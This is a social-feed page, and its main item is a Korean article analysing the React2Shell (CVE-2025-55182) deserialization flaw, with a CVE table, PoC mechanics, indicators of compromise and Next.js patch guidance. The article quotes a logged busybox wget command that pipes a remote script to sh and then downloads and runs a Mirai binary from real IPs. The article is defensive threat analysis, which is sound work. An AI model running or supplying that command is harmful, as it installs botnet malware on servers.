What is Hackers' Pub?

Hackers' Pub is a place for software engineers to share their knowledge and experience with each other. It's also an ActivityPub-enabled social network, so you can follow your favorite hackers in the fediverse and get their latest posts in your feed.

0
0
0
:octp_utut:ๆ–ฐ่•Ž้บฆ:io::octp_tktk::blobcat_ago: @Sosk_sba@misskey.io
Public

IOSใ‚ขใƒ—ใƒ‡ใ—ใฆใ‹ใ‚‰ไบบใฎใƒ—ใƒญใƒ•ๅ‡บใ‚‹้ ปๅบฆ้ซ˜ใใฆๆฃฎใ€€ใชใ‚“ใ ใฃใŸใ‚‰่งฆใฃใฆใชใ„ใฎใซๅ‡บใ‚‹ๆ™‚ใ‚ใ‚‹ใ€€ๆ€–ใ„ใ‚

1
0
0
0
0
0
0
0
0
Hacker News 50 @hn50@social.lansky.name
Public

Locked out: How a gift card purchase destroyed an Apple account

Link: appleinsider.com/articles/25/1
Discussion: news.ycombinator.com/item?id=4

How a gift card purchase destroyed an Apple account

Locked out: How a gift card purchase destroyed an Apple account

The locking of an Apple Account and the difficulty one loyal Apple customer has experienced in regaining access is a stark reminder to be vigilant when buying gift cards for the holidays.

appleinsider.com ยท AppleInsider

0
0
0
1
0
0
1
0
0

์—ผ์‚ฐํ•˜ shared the below article:

React2Shell ์ทจ์•ฝ์ ์˜ ํŠน์„ฑ์„ ์•Œ์•„๋ณด์ž

๊ณ ๋‚จํ˜„ @gnh1201@hackers.pub

React2Shell ์ทจ์•ฝ์ ์ด๋ž€?

์™ธ๋ถ€์—์„œ ์ˆ˜์‹ ๋œ ํŠน์ •ํ•œ ๊ทœ๊ฒฉ์— ๋”ฐ๋ผ ๊ตฌ์กฐ์ ์œผ๋กœ ์ž‘์„ฑ๋œ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•œ๋‹ค๋ฉด, ๊ณต๊ฒฉ์ž๊ฐ€ ์–ด๋– ํ•œ ์˜๋„๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋ฉด ๋ฐ์ดํ„ฐ๋ฅผ ๋ณด๋‚ผ ๋•Œ ์‹คํ–‰ ๊ฐ€๋Šฅํ•œ ์•…์˜์  ์ฝ”๋“œ๋ฅผ ๊ฐ™์ด ๋„ฃ์–ด ๋ณด๋‚ผ ๊ฐ€๋Šฅ์„ฑ์„ ๋ฐฐ์ œํ•  ์ˆ˜ ์—†๋‹ค.

์ด๊ฒƒ์ด ๋ณด์•ˆ ์•ฝ์ ์ด ๋˜์ง€ ์•Š๊ธฐ ์œ„ํ•ด์„  ์ด๋Ÿฌํ•œ ๊ณต๊ฒฉ์ž์˜ ์˜๋„๋ฅผ ๋ง‰์•„์•ผํ•˜์ง€๋งŒ, React2Shell (CVE-2025-55182) ์ทจ์•ฝ์ ์€ ์ด๋Ÿฌํ•œ ๊ณต๊ฒฉ์ž์˜ ์˜๋„๋ฅผ ๋ง‰์ง€ ๋ชปํ•˜๊ณ  ์‹คํ–‰์„ ๋ฌด์ œํ•œ ํ—ˆ์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์ด ๋ฐœ๊ฒฌ๋œ ๊ฒƒ์ด๋‹ค.

ํŠน์ •ํ•œ ๊ทœ๊ฒฉ์— ๋”ฐ๋ผ ๊ตฌ์กฐ์ ์œผ๋กœ ์ž‘์„ฑ๋œ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ณผ์ •์„ ์ผ์ปซ๋Š” ์šฉ์–ด๋ฅผ "์—ญ์ง๋ ฌํ™”"(Deserialization)์ด๋ผ๊ณ  ํ•œ๋‹ค.

ํŠน์ •ํ•œ ๊ทœ๊ฒฉ์€ ์ž˜ ์•Œ๋ ค์ง„ JSON, XML, YAML๊ฐ€ ๋  ์ˆ˜๋„ ์žˆ๊ณ , ์ž์ฒด ๊ทœ๊ฒฉ์ด ๋  ์ˆ˜๋„ ์žˆ๊ณ , ํ˜ผํ•ฉํ˜•์ด ๋  ์ˆ˜๋„ ์žˆ๋‹ค. React2Shell ์ทจ์•ฝ์ ์€ ํ˜ผํ•ฉํ˜•(JSON + aka. Flight)์„ ์‚ฌ์šฉํ•˜์˜€๋‹ค.

์ž์ฒด ๊ทœ๊ฒฉ(aka. Flight)์ด JavaScript๋กœ ์ •์˜๋œ ๊ฐ์ฒด์˜ ์„ฑ๊ฒฉ์„ ์ž„์˜๋กœ ๋ณ€๊ฒฝ(Prototype ๊ฐœ๋… ์ƒ ์กด์žฌํ•˜๋Š” ์ƒ์„ฑ์ž ์ˆ˜์ค€์˜ ์†์„ฑ(__proto__, constructor)์— ์ ‘๊ทผํ•˜์—ฌ ๊ฐ์ฒด์˜ ์„ฑ๊ฒฉ์„ ์ž„์˜๋กœ ๋ฐ”๊ฟ€ ์ˆ˜ ์žˆ์Œ)ํ•˜๋Š”๋ฐ ํ•„์š”ํ•œ ์ ‘๊ทผ์„ฑ์„ ๊ฐ€์ง€๊ณ  ์žˆ์—ˆ๊ธฐ์— ๊ฐ€๋Šฅํ•œ ๊ฒƒ์ด์—ˆ๋‹ค.

์—ญ์ง๋ ฌํ™”(Deserialization) ๊ณผ์ •์€ ์™œ ์œ„ํ—˜ํ•œ๊ฐ€?

์‹ค๋ฌด์ ์œผ๋กœ ์—ญ์ง๋ ฌํ™” ๊ณผ์ •์ด ์œ„ํ—˜ํ•ด์ง€๋Š” ์ด์œ ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

  1. ๋ฐ์ดํ„ฐ ๊ตํ™˜ ํฌ๋งท์€ ์ž๋ฃŒํ˜•์— ์—„๊ฒฉํ•˜์ง€ ์•Š๋‹ค: ์›ํ™œํ•œ ๋ฐ์ดํ„ฐ ๊ตํ™˜์ด ์ตœ์šฐ์„ ์ด๋ผ๋Š” ๋ชฉ์ ์— ๋งŒ์กฑํ•˜๊ธฐ ์œ„ํ•ด ์—„๊ฒฉํ•œ ์ž๋ฃŒํ˜•(Type-safe)์„ ์‚ฌ์šฉํ•˜๋„๋ก ์„ค๊ณ„ํ•˜์ง€ ์•Š๋Š”๋‹ค. ์ด๊ฒƒ์€ ์ž๋ฃŒํ˜• ํ˜ผ๋ž€(Type Confusion)์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•œ ๋‹ค์–‘ํ•œ ๋ฐฉ์‹์˜ ํƒˆ์˜ฅ ์‹œ๋„๋ฅผ ๊ฐ€๋Šฅ์ผ€ํ•ด์ฃผ๋Š” ๋‹จ์„œ๊ฐ€ ๋˜๊ธฐ๋„ ํ•œ๋‹ค.
  2. ํŠน์ • ๋‹จ์–ด ๋˜๋Š” ํŠน์ • ๊ธฐํ˜ธ๊ฐ€, ํŠน์ • ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•˜๋Š” ์‹ ํ˜ธํƒ„(Trigger) ์—ญํ• ์„ ํ•œ๋‹ค: ํŠน์ • ํŠน์ • ๋‹จ์–ด ๋˜๋Š” ํŠน์ • ๊ธฐํ˜ธ์— ์˜ํ•ด ์ด‰๋ฐœ๋˜๋Š” ํŠน์ • ์ž‘์—…์˜ ์œ ํšจ์„ฑ ๊ฒ€์ฆ ์ ˆ์ฐจ๊ฐ€ ๋ฏธํกํ•˜๋ฉฐ ํ•ด๋‹น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ๋ฒ”์œ„๋ฅผ ๋ฒ—์–ด๋‚˜ ์‹œ์Šคํ…œ์œผ๋กœ ๊ถŒํ•œ ์ƒ์Šน๊ณผ ๋ช…๋ น ์‹คํ–‰์„ ํ—ˆ์šฉํ•˜๋Š” ํ†ต๋กœ๊ฐ€ ๋œ๋‹ค. ์‹ค๋ฌด์ ์œผ๋กœ ๊ฐ€์žฅ ๋น„์ค‘์ด ๋†’์€ ์œ ํ˜•์ด๋‹ค.
  3. ๋ฏธ๋ฆฌ ์‹๋ณ„๋˜์ง€ ๋ชปํ•œ ์˜ˆ์•ฝ์–ด๊ฐ€ ์žˆ์„ ์ˆ˜ ์žˆ๋‹ค: ๋“œ๋ฌผ์ง€๋งŒ ํŠน์ • ์–ธ์–ด, ํŠน์ • ํ”„๋ ˆ์ž„์›Œํฌ, ํŠน์ • ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ, ๋˜๋Š” ํŠน์ • ํŽŒ์›จ์–ด ๋“ฑ ์—ฐ๊ด€๋œ ์˜์กด์„ฑ์—์„œ ๋ช…ํ™•ํ•˜๊ฒŒ ์‹๋ณ„๋˜์ง€ ๋ชปํ•œ ์˜ˆ์•ฝ์–ด(๋‹จ์–ด, ๊ธฐํ˜ธ)๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ตฌํ˜„์ด ์กด์žฌํ•  ๊ฐ€๋Šฅ์„ฑ๋„ ์žˆ๋‹ค. ์ด๋Š” ํŠน์ • ์กฐ๊ฑด์ด ๋งž์œผ๋ฉด ๋ฐœํ˜„๋  ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ๋‹ค.

์ด ์™ธ์—๋„ ์—ญ์ง๋ ฌํ™” ๊ณผ์ •์€ ์œ ์‚ฌํ•œ ์—ฌ๋Ÿฌ ์ทจ์•ฝ ๊ฐ€๋Šฅ์„ฑ์„ ๊ฐ€์ง€๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์—, ์—ญ์ง๋ ฌํ™” ๊ณผ์ •์„ ๋ณดํ˜ธํ•˜๊ธฐ ์œ„ํ•œ ์—ฌ๋Ÿฌ ๋ณด์™„ ์žฅ์น˜์˜ ๊ตฌํ˜„์ด ํ•„์š”ํ•˜๋‹ค.

์•Œ๋ ค์ง„ ์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์  ์‚ฌ๋ก€ (์–ธ์–ด ๋ฐ ์ƒํƒœ๊ณ„๋ณ„)

์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์ด ์–ด๋–ค ์„ฑ๊ฒฉ์„ ๊ฐ€์ง€๋Š” ์ทจ์•ฝ์ ์ธ์ง€ ๋น ๋ฅด๊ฒŒ ์ดํ•ดํ•˜๊ธฐ ์œ„ํ•ด์„ , ์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ๊ณผ ์—ฐ๊ด€์ด ์žˆ๋Š” ์ทจ์•ฝ์  ์‚ฌ๋ก€์™€ ๊ณตํ†ต์ ์ธ ํŠน์ง•์„ ์‚ดํŽด๋ณผ ์ˆ˜ ์žˆ๋‹ค. ๊ทธ ์‚ฌ๋ก€๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

์–ธ์–ด / ์ƒํƒœ๊ณ„์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์  ์‚ฌ๋ก€์ฃผ์š” ๊ณตํ†ต์ 
JavaCVE-2021-44228 (Log4Shell), CVE-2017-9805 (Apache Struts2 REST), CVE-2020-8840 (jackson-databind)์™ธ๋ถ€ ์ž…๋ ฅ์ด ๊ฐ์ฒด ์ƒ์„ฑยท์—ญ์ง๋ ฌํ™” ๊ฒฝ๋กœ(JNDI, XML/JSON ๋ฐ”์ธ๋”ฉ) ๋กœ ์œ ์ž…๋˜์–ด gadget chain ๋˜๋Š” ์›๊ฒฉ ํด๋ž˜์Šค ๋กœ๋”ฉ์„ ํ†ตํ•ด RCE ๋ฐœ์ƒ
.NET (C# / VB.NET)CVE-2019-18935 (Telerik UI), CVE-2025-53690 (Sitecore ViewState), CVE-2020-25258 (Hyland OnBase)BinaryFormatterยทViewState ๋“ฑ ๋ ˆ๊ฑฐ์‹œ ์—ญ์ง๋ ฌํ™” ํฌ๋งท์„ ์‹ ๋ขฐํ•˜์—ฌ ์ž„์˜ ํƒ€์ž… ๋กœ๋”ฉยท์ฝ”๋“œ ์‹คํ–‰
PythonCVE-2017-18342 (PyYAML unsafe load), CVE-2024-9701 (Kedro ShelveStore), CVE-2024-5998 (LangChain FAISS)pickleยทunsafe YAML ๋กœ๋” ์‚ฌ์šฉ์œผ๋กœ ์—ญ์ง๋ ฌํ™” ์ž์ฒด๊ฐ€ ์‹คํ–‰ ํŠธ๋ฆฌ๊ฑฐ
PHP (WP)CVE-2023-6933 (Better Search Replace), CVE-2025-0724 (ProfileGrid), CVE-2024-5488 (SEOPress)unserialize() / maybe_unserialize()์— ์‚ฌ์šฉ์ž ์ž…๋ ฅ์ด ์ „๋‹ฌ๋˜์–ด PHP Object Injection(POP chain) ๋ฐœ์ƒ
RubyCVE-2013-0156 (Rails YAML.load), CVE-2020-10663 (RubyGems Marshal)YAML.loadยทMarshal.load ์‚ฌ์šฉ ์‹œ ์ž„์˜ ๊ฐ์ฒด ์ƒ์„ฑ โ†’ ์ฝ”๋“œ ์‹คํ–‰
JavaScript / Node.jsCVE-2025-55182 (React2Shell), CVE-2020-7660 (serialize-javascript)๊ตฌ์กฐ ๋ณต์›ยท๊ฐ์ฒด ์žฌ๊ตฌ์„ฑ ๋กœ์ง์ด ์‹ ๋ขฐ๋˜์ง€ ์•Š์€ ์ž…๋ ฅ์„ ์ฝ”๋“œ/๊ฐ์ฒด๋กœ ํ•ด์„
GoCVE-2022-28948 (go-yaml Unmarshal), CVE-2020-16845 (HashiCorp Consul)Unmarshal ๋‹จ๊ณ„์—์„œ ์ž…๋ ฅ ๊ฒ€์ฆ ๋ถ€์กฑ โ†’ ๊ตฌ์กฐ์ฒด ๋ณต์› ๊ธฐ๋ฐ˜ ๋กœ์ง ๋ถ•๊ดดยทDoS
RustGHSA-w428-f65r-h4q2 (serde_yaml / unsafe deserialization, CVE-2021-45687)๋ฉ”๋ชจ๋ฆฌ ์•ˆ์ „๊ณผ ๋ฌด๊ด€ํ•˜๊ฒŒ serde ๊ธฐ๋ฐ˜ ์—ญ์ง๋ ฌํ™”์—์„œ ์‹ ๋ขฐ๋˜์ง€ ์•Š์€ ๋ฐ์ดํ„ฐ๊ฐ€ ๋‚ด๋ถ€ ํƒ€์ž…์œผ๋กœ ๋ณต์›๋˜์–ด ๋กœ์ง ์˜ค์—ผยทDoSยท์ž ์žฌ์  ์ฝ”๋“œ ์‹คํ–‰ ์œ„ํ—˜
Kotlin / AndroidCVE-2024-43080 (Android) / CVE-2024-10382 (Android Car)Intent/Bundle/IPC ์—ญ์ง๋ ฌํ™” ์‹œ ํƒ€์ž…ยท๊ฒ€์ฆ ๋ฏธํก โ†’ ๊ถŒํ•œ ์ƒ์ŠนยทDoS
C / C++CVE-2024-8375 (Google Reverb, Related to gRPC and protobuf)Unpack ๊ณผ์ •์—์„œ ๋ฐ์ดํ„ฐํƒ€์ž…(VARIANT), vtable ํฌ์ธํ„ฐ ์˜ค์—ผ ๋“ฑ ๋ฌด๊ฒฐ์„ฑ ๊ฒ€์ฆ ๋ถ€์กฑ
Swift / iOSCVE-2021-32742 (Vapor)์™ธ๋ถ€ ์ž…๋ ฅ์„ ๋””์ฝ”๋”ฉ/๊ฐ์ฒด ๋ณต์› ์‹œ ์‹ ๋ขฐ ๊ฒฝ๊ณ„ ๋ถ•๊ดด โ†’ DoSยท์ •๋ณด ๋…ธ์ถœ
์‚ฐ์—…์šฉ (ICS/OT)CVE-2024-12703, CVE-2023-27978 (Schneider Electric), CVE-2025-2566 (Kaleris Navis N4), CVE-2023-32737 (Siemens SIMATIC)ํ”„๋กœ์ ํŠธ ํŒŒ์ผยท๊ด€๋ฆฌ ์„œ๋ฒ„ ์ž…๋ ฅ์„ ์‹ ๋ขฐ๋œ ๋‚ด๋ถ€ ๋ฐ์ดํ„ฐ๋กœ ๊ฐ€์ •ํ•˜๊ณ  ์—ญ์ง๋ ฌํ™” โ†’ RCE ๋ฐ ๋ฌผ๋ฆฌ ์‹œ์Šคํ…œ ์˜ํ–ฅ ๊ฐ€๋Šฅ

์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์€ ์–ธ์–ด์™€ ํ™˜๊ฒฝ์„ ๊ฐ€๋ฆฌ์ง€ ์•Š๊ณ  ๋‹ค์–‘ํ•˜๊ฒŒ ๋‚˜ํƒ€๋‚˜๊ณ  ์žˆ์œผ๋ฉฐ, ๋ฐœ๊ฒฌ๋œ ์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์€ ์ทจ์•ฝ์  ์ ์ˆ˜(CVSS 3.x)์—์„œ๋„ 8.0์—์„œ 10.0 ๋ฒ”์œ„์˜ ๋งค์šฐ ๋†’์€ ์ ์ˆ˜๋ฅผ ๋ฐ›๊ณ  ์žˆ๋‹ค.

์ด์ œ ์‚ฌ์ „ ์ •๋ณด ์—†์ด๋„ ๊ณต๊ฒฉ ํŠน์„ฑ์„ ์ฝ์„ ์ˆ˜ ์žˆ๋‹ค.

์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์ด ์–ด๋–ค ๊ณตํ†ต์ ์ธ ํŠน์„ฑ์„ ๊ฐ€์ง€๋Š”์ง€ ์„ค๋ช…ํ–ˆ์œผ๋‹ˆ, ์ด์ œ React2Shell ๊ณต๊ฒฉ์˜ ๊ฐœ๋…์ฆ๋ช…(PoC)์—์„œ ๋ณด์ธ ๊ณต๊ฒฉ ํŠน์„ฑ์„ ์‚ฌ์ „ ์ •๋ณด(๊ณต๊ฒฉ ๋Œ€์ƒ์ธ RSC์˜ ๋‚ด๋ถ€ ์ดํ•ด)๊ฐ€ ์—†์ด๋„ ์–ด๋Š์ •๋„ ํŒŒ์•…ํ•  ์ˆ˜ ์žˆ๋‹ค.

์—ฌ๊ธฐ ๊ฐ๊ฐ JavaScript์™€ Python์œผ๋กœ ์ž‘์„ฑ๋œ ์ฃผ์š” ๊ณต๊ฒฉ ๊ฐœ๋…์ฆ๋ช… ์ฝ”๋“œ๊ฐ€ ์žˆ๋‹ค.

  • https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc/blob/main/01-submitted-poc.js
  • https://github.com/msanft/CVE-2025-55182/blob/main/poc.py

์—ฌ๊ธฐ์„œ ์•Œ ์ˆ˜ ์žˆ๋Š” ์ •๋ณด๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

  1. ์ž˜ ์•Œ๋ ค์ง„ ํฌ๋งท(JSON ๋“ฑ)๊ณผ ํ•จ๊ป˜ ๋ณด์ด๋Š” Colon-sperated String๊ณผ ๊ฐ™์€ ํŒจํ„ด์€ ํ™œ์šฉ ๋ถ„์•ผ์— ๋”ฐ๋ผ Micro-operations, Opcodes ๋“ฑ์˜ ์šฉ์–ด๋กœ ๋ถˆ๋ฆฌ๋ฉฐ, ๋น„์‹คํ–‰ ํฌ๋งท์„ ์ตœ์†Œ ๋ช…๋ น ์‹คํ–‰์ด ๊ฐ€๋Šฅํ•œ ํฌ๋งท์œผ๋กœ ํ™œ์šฉํ•˜๊ฒ ๋‹ค๋Š” ์˜๋„๋ฅผ ๋‚˜ํƒ€๋‚ธ๋‹ค. ๊ตฌํ˜„ ์‹œ ๋ฌด๊ฒฐ์„ฑ์— ์ฃผ์˜๋ฅผ ๋” ๊ธฐ์šธ์ด์ง€ ์•Š์œผ๋ฉด ์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์„ ๋ถˆ๋Ÿฌ๋“ค์ด๋Š” ์ข‹์€ ๋ณต์„ ์ด ๋œ๋‹ค.
  2. ์ƒ์„ฑ์ž ์ˆ˜์ค€์˜ ํ‚ค์›Œ๋“œ (__proto__, constructor )๋ฅผ ํ†ตํ•ด Prototype์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๋Š” ์ ‘๊ทผ์„ฑ์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. ์šฉ์–ด๋กœ๋Š” "JavaScript prototype pollution"๋ผ๊ณ  ํ•œ๋‹ค.
  3. then ํ‚ค์›Œ๋“œ๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ ๋Œ€์ƒ ๋‚ด๋ถ€์— ์กด์žฌํ•˜๋Š” Promise ๊ฐ์ฒด์— ๋ถ™๊ฒ ๋‹ค(๋˜๋Š” ์ƒˆ๋กœ์šด Promise ๊ฐ์ฒด๋ฅผ ๋งŒ๋“ค๊ฒ ๋‹ค)๋Š” ์˜๋„๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.
  4. ํŽ˜์ด๋กœ๋“œ์˜ value ํ•„๋“œ ๊ฐ’์ด ์•„์ง ์—ญ์ง๋ ฌํ™” ๋˜๊ธฐ ์ „์˜ ๋ฌธ์ž์—ด ํ˜•ํƒœ์˜ JSON์ธ ๊ฒƒ์œผ๋กœ ๋ดค์„ ๋•Œ, ๊ณต๊ฒฉ ๋Œ€์ƒ ๋‚ด๋ถ€์—์„œ JSON.parse ๋ฉ”์†Œ๋“œ์˜ ํ˜ธ์ถœ์„ ์˜ˆ์ƒํ•  ์ˆ˜ ์žˆ๋‹ค.
  5. ๊ณต๊ฒฉ ์ฝ”๋“œ๋กœ ๋ณด์ด๋Š” _response._prefix ์˜ ์ฃผ์ž…์€ then ํ‚ค์›Œ๋“œ๊ฐ€ ๋“ฑ์žฅํ•˜๋Š” ์œ„์น˜์™€ ์ตœ๋Œ€ํ•œ ๊ฐ€๊นŒ์šด ๊ณณ์—์„œ ์ผ์–ด๋‚˜์•ผ ํ•œ๋‹ค. ๊ทธ๋ž˜์•ผ Promise ๊ฐ์ฒด๊ฐ€ ๊ณต๊ฒฉ ์ฝ”๋“œ๋ฅผ ํŠธ๋ฆฌ๊ฑฐํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค.
  6. ๊ฒฐ๊ตญ JSON ์—ญ์ง๋ ฌํ™” ๊ณผ์ •์ด ์ผ์–ด๋‚˜๋ฉด์„œ, then ์†์„ฑ์„ ๊ฐ€์ง€๋ฉด์„œ, ๊ณต๊ฒฉ ์ฝ”๋“œ๋ฅผ ์ˆ˜์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๊ฐ€์žฅ ์—ฐ๊ด€์„ฑ ๋†’์€ ํ‘œํ˜„์ด๋ผ๋Š” ์ ์„ ๋ชจ๋‘ ๋งŒ์กฑํ•˜๋Š” ๋ถ€๋ถ„์€ {"then": "$Bx"}๋ผ๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. $Bx๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ณผ์ • ์ค‘ (๋˜๋Š” $Bx๊ฐ€ ์ฒ˜๋ฆฌํ•œ ๊ฒฐ๊ณผ์— ๋Œ€ํ•œ ์‚ฌํ›„) ๊ฒ€์ฆ์ด ๋ถ€์กฑํ•˜๋‹ค๋Š” ์˜๋ฏธ์ด๋‹ค.
  7. ๊ณต๊ฒฉ ์ ˆ์ฐจ์— ํฌํ•จ๋˜๋Š” Next-Action ํ—ค๋”๋Š” ์• ์ดˆ์— ์ด ์ทจ์•ฝ์ ์˜ ์›์ธ์ด ๋œ ์–ด๋–ค ๊ธฐ๋Šฅ์„ ์ผœ๊ณ  ๋„๋Š” ๊ฒƒ์— ๊ด€ํ•œ ๊ฒƒ์ž„์„ ์˜ˆ์ƒํ•  ์ˆ˜ ์žˆ๋‹ค. ๊ฐœ๋ฐœ๋œ ์•ฑ์— ์กด์žฌํ•˜๋Š” ์œ ํšจํ•œ ์•ก์…˜์— ๋Œ€ํ•œ Key๋ฅผ ์•Œ ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ทธ ์•ก์…˜์˜ ์‹คํ–‰์„ ์š”์ฒญํ•จ์œผ๋กœ์„œ ๊ณต๊ฒฉ ์ฝ”๋“œ ๋˜ํ•œ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค.

๊ณต๊ฒฉ์ž๋Š” ์ด ์ทจ์•ฝ์ ์„ ์ด์šฉํ•ด์„œ ๋ญ˜ํ•˜๋‚˜?

Catswords OSS๋กœ ์ œ๋ณด๋œ ๋‚ด์šฉ์— ๋”ฐ๋ฅด๋ฉด, React2Shell์— ๋…ธ์ถœ๋œ ์„œ๋ฒ„๋Š” ์ด๋Ÿฐ ๋ช…๋ น์ด ๋“ค์–ด์˜จ๋‹ค๊ณ  ํ•œ๋‹ค. ํ•œ ํšŒ์›์ด ํ•™์Šต์šฉ์œผ๋กœ ๊ตฌ์ถ•ํ•œ React ์„œ๋ฒ„์—์„œ ๋ฐœ๊ฒฌ๋œ ๋กœ๊ทธ์ด๋‹ค.

(busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh; \
 cd /dev; \
 busybox wget http://31.56.27.76/n2/x86; \
 chmod 777 x86; \
 ./x86 reactOnMynuts)

์ด ํŒŒ์ผ์˜ ์ •์ฒด๋Š” Mirai botnet์ด๋ผ ๋ถ€๋ฅด๋Š” ๊ณ„์—ด์˜ ์•…์„ฑ์ฝ”๋“œ์ด๋‹ค. React2Shell์— ์ทจ์•ฝํ•œ ์„œ๋ฒ„๋“ค์€ ์ด๋Ÿฐ ์•…์„ฑ์ฝ”๋“œ๋“ค์„ ์„œ๋ฒ„์— ์ฃผ์ž…๋ฐ›๊ฒŒ ๋œ๋‹ค.

๊ทธ๋Ÿผ ์ด ์•…์„ฑ์ฝ”๋“œ์˜ ๋ช…์„ฑ(?)์€ ์–ด๋Š์ •๋„์ผ์ง€ ํ•œ๋ฒˆ ์ฒดํฌํ•ด๋ณด์ž.

  • https://www.virustotal.com/gui/file/858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (33/65 security vendors flagged this file as malicious)

(๊ทธ๋ž˜ ๋„ˆ ๋‚˜์œ๊ฑฐ ์•Œ์•˜์œผ๋‹ˆ ๊ทธ๋งŒ ์•Œ์•„๋ณด์ž)

๊ด€๋ จ IoC ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

  • 3ba4d5e0cf0557f03ee5a97a2de56511 (MD5)
  • 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (SHA256)
  • http://193.34.213.150/nuts/bolts (URL)
  • http://31.56.27.76/n2/x86 (URL)

๋ฒ”์šฉ botnet์ด ์„ค์น˜๋˜๊ธฐ ๋•Œ๋ฌธ์— ์‚ฌ์‹ค์ƒ DDoS ๊ณต๊ฒฉ ๋“ฑ ๋‹ค์–‘ํ•œ ๋ชฉ์ ์œผ๋กœ ์•…์šฉ๋˜๋Š” ์„œ๋ฒ„๊ฐ€ ๋œ๋‹ค.

์ถ”๊ฐ€ ๋ถ„์„์€ ์•„๋ž˜ ๋งํฌ์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

  • https://www.mbsd.jp/research/20251211/react2shell/
  • https://www.bitdefender.com/en-us/blog/labs/cve-2025-55182-exploitation-hits-the-smart-home

์ด ๊ณต๊ฒฉ์„ ์–ด๋–ป๊ฒŒ ์™„ํ™”ํ•ด์•ผํ• ๊นŒ?

๋ฒ„์ „ ์—…๋ฐ์ดํŠธ๋กœ ํ•ด๊ฒฐํ•˜๊ธฐ

Next.js๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์„œ๋ฒ„๋ผ๋ฉด ์ทจ์•ฝ์ ์ด ํ•ด๊ฒฐ๋œ ๋ฒ„์ „์œผ๋กœ ์—…๋ฐ์ดํŠธํ•˜์—ฌ์•ผ ํ•œ๋‹ค. Next.js์˜ ๊ฐœ๋ฐœ์‚ฌ Vercel์€ ์ทจ์•ฝํ•œ ๋ฒ„์ „์— ๋Œ€ํ•ด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์•ˆ๋‚ดํ•˜๊ณ  ์žˆ๋‹ค.

Vulnerable version Patched release
Next.js 15.0.x 15.0.5
Next.js 15.1.x 15.1.9
Next.js 15.2.x 15.2.6
Next.js 15.3.x 15.3.6
Next.js 15.4.x 15.4.8
Next.js 15.5.x 15.5.7
Next.js 16.0.x 16.0.10
Next.js 14 canaries after 14.3.0-canary.76 Downgrade to 14.3.0-canary.76 (not vulnerable)
Next.js 15 canaries before 15.6.0-canary.58 15.6.0-canary.58
Next.js 16 canaries before 16.1.0-canary.12 16.1.0-canary.12 and after

ํ˜น์—ฌ ์—…๋ฐ์ดํŠธ์— ๊ณค๋ž€์„ ๊ฒช๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ, Vercel์—์„œ ๊ณต์‹ ์ œ๊ณตํ•˜๋Š” ํŒจ์น˜ ๋„๊ตฌ๋ฅผ ํ™œ์šฉํ•˜๋Š” ๊ฒƒ๋„ ์ข‹์€ ๋ฐฉ๋ฒ•์ด ๋  ์ˆ˜ ์žˆ๋‹ค.

  • https://github.com/vercel-labs/fix-react2shell-next

๋ฐฉํ™”๋ฒฝ(WAF ๋“ฑ) ๊ทœ์น™์˜ ๊ฐœ์„ ์œผ๋กœ ์™„ํ™”ํ•˜๊ธฐ

Next-Action ํ—ค๋” + ์‹œ์Šคํ…œ OS ๋ช…๋ น์–ด + ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ์˜ Array ๋˜๋Š” Object ๊ด€๋ จ ๋ฉ”์†Œ๋“œ, ์ด๋ ‡๊ฒŒ 3์š”์†Œ๊ฐ€ ๊ฐ™์€ ์š”์ฒญ์— ๋™์‹œ์— ๋“ค์–ด์žˆ๋Š”๊ฑด ํ”ํ•œ ์ƒํ™ฉ์€ ์•„๋‹ˆ๋ผ๋Š” ์ ์„ ๊ณ ๋ คํ•ด์„œ ์ฐจ๋‹จ ๊ทœ์น™์„ ๋งŒ๋“œ๋Š” ๊ฒƒ๋„ ๋ฐฉ๋ฒ•์ด ๋  ์ˆ˜ ์žˆ๋‹ค.

Read more โ†’
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
